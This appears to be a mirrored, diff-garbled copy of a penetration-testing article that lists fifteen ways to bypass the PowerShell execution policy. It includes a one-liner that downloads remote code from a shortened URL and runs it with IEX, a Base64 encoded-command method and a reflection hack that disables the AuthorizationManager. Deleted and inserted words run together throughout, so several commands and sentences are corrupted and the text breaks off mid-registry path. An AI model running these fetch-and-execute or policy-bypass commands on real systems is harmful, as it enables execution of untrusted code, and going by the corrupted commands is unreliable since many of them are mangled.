Bypass the PowerShell Execution Policy

💻 15 Ways to Bypass the PowerShell Execution Policy

Author: Scott Sutherland

~~Original Article:~~Source: NetSPI Blog

🧠 Introduction

ByPowerShell’s ~~default,~~execution ~~PowerShell~~policy is ~~configured~~a safety feature designed to prevent the unintended execution of ~~scripts~~scripts. onHowever, ~~Windows systems. This can pose challenges for~~during penetration ~~testers,~~tests ~~system~~or ~~administrators,~~red ~~and~~team ~~developers.~~operations, ~~However,~~you ~~there~~may ~~are multiple methods~~need to bypass ~~these~~this ~~restrictions~~restriction — without ~~requiring~~administrative ~~local administrator rights.~~privileges.

1.🔐 Bypass Techniques

Paste ~~the Script~~ into anInteractive ~~Interactive~~Console
Open a PowerShell ~~Console~~

~~Simply copy~~console and paste ~~your PowerShell~~the script ~~directly~~directly. ~~into~~Execution anpolicy ~~interactive~~is ~~console.~~not ~~This~~enforced ~~method~~line-by-line.

~~doesn't require writing to disk or changing configurations.~~

2.

Echo ~~the Script~~ and Pipe it to PowerShell ~~Standard Input~~

Echoecho Write-Host "My voice is my passport, verify me." | PowerShell.exepowershell -noprofile -

3.

~~Read Script from a~~Pipe File ~~and Pipe~~Contents to PowerShell ~~Standard Input~~

Get-Content .\runme.ps1 | PowerShell.exepowershell -noprofile -

TYPEtype .\runme.ps1 | PowerShell.exepowershell -noprofile -

4.

Download ~~Script from URL~~ and Execute ~~with~~via ~~Invoke Expression~~IEX

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"

5.

Use ~~the~~ -Command ~~Switch~~Parameter

PowerShellpowershell -command "Write-Host 'MyExecution voicepolicy? isWhat my passport, verify me.policy?'"

6.

Use ~~the~~EncodedCommand
Encode ~~EncodeCommand~~your ~~Switch~~script into Base64 and pass it:


$command = "Write-Host 'MyExecution voicepolicy? isWhat my passport, verify me.policy?'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exepowershell -EncodedCommand $encodedCommand

7.📘 Use the Invoke-Command CommandNotes

Invoke-Command

~~-ScriptBlock~~Most ~~{Write-Host~~methods ~~"My~~don’t ~~voice~~require isadmin myrights. ~~passport,~~These ~~verify~~are ~~me."}~~

8. Use the Invoke-Expression Command

Get-Content .\runme.ps1 | Invoke-Expression

9. Use the “Bypass” Execution Policy Flag

PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

10. Use the “Unrestricted” Execution Policy Flag

PowerShell.exe -ExecutionPolicy UnRestricted -File .\runme.ps1

11. Use the “Remote-Signed” Execution Policy Flag

PowerShell.exe -ExecutionPolicy RemoteSigned -File .\runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

function Disable-ExecutionPolicy {
  ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue($executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
}
Disable-ExecutionPolicy
.\runme.ps1

13. Set the ExecutionPolicyhelpful for thepentesting, Processscripting, Scope

Set-ExecutionPolicywhen Bypassgroup -Scopepolicy Process

interferes

14.with Setlegitimate theautomation. ExecutionPolicy

Ensure ~~for~~you're ~~the~~complying ~~CurrentUser~~with ~~Scope~~local ~~via~~policies ~~Command~~and

Set-ExecutionPolicylaws -Scopewhen CurrentUserusing -ExecutionPolicythese UnRestricted

techniques.

15. Set the ExecutionPolicy for the CurrentUser Scope via the Registry

~~Modify~~Last ~~the~~mirrored ~~registry~~from ~~key:~~NetSPI: https://www.netspi.com/blog/...

HKEY_CURRENT_USER\Softw